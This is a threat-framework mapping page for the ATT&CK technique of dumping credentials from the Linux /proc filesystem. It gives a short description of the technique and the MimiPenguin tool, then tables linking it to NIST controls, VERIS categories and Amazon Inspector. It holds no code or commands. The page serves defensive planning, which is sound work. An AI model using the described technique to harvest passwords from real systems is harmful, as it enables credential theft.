Adversaries may gather credentials from information stored in the Proc filesystem or <code>/proc</code>. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.
This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.
View in MITRE ATT&CK®| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| AC-2 | Account Management | Protects | T1003.007 | Proc Filesystem | |
| AC-3 | Access Enforcement | Protects | T1003.007 | Proc Filesystem | |
| AC-5 | Separation of Duties | Protects | T1003.007 | Proc Filesystem | |
| AC-6 | Least Privilege | Protects | T1003.007 | Proc Filesystem | |
| CA-7 | Continuous Monitoring | Protects | T1003.007 | Proc Filesystem | |
| CM-2 | Baseline Configuration | Protects | T1003.007 | Proc Filesystem | |
| CM-5 | Access Restrictions for Change | Protects | T1003.007 | Proc Filesystem | |
| CM-6 | Configuration Settings | Protects | T1003.007 | Proc Filesystem | |
| IA-2 | Identification and Authentication (organizational Users) | Protects | T1003.007 | Proc Filesystem | |
| IA-5 | Authenticator Management | Protects | T1003.007 | Proc Filesystem | |
| SC-28 | Protection of Information at Rest | Protects | T1003.007 | Proc Filesystem | |
| SC-39 | Process Isolation | Protects | T1003.007 | Proc Filesystem | |
| SI-3 | Malicious Code Protection | Protects | T1003.007 | Proc Filesystem | |
| SI-4 | System Monitoring | Protects | T1003.007 | Proc Filesystem |
| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| action.malware.variety.In-memory | (malware never stored to persistent storage) | related-to | T1003.007 | OS Credential Dumping: Proc Filesystem | |
| action.malware.variety.Password dumper | Password dumper (extract credential hashes) | related-to | T1003.007 | OS Credential Dumping: Proc Filesystem |
| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| amazon_inspector | Amazon Inspector | technique_scores | T1003.007 | Proc Filesystem |
Comments
The Amazon Inspector Best Practices assessment package can assess security control "Configure permissions for system directories" that prevents privilege escalation by local users and ensures only the root account can modify/execute system configuration information and binaries. Amazon Inspector does not directly protect against system modifications rather it just checks to see if security controls are in place which can inform decisions around hardening the system. Due to this and the fact the security control is only supported for Linux platforms, the score is Minimal.
References
|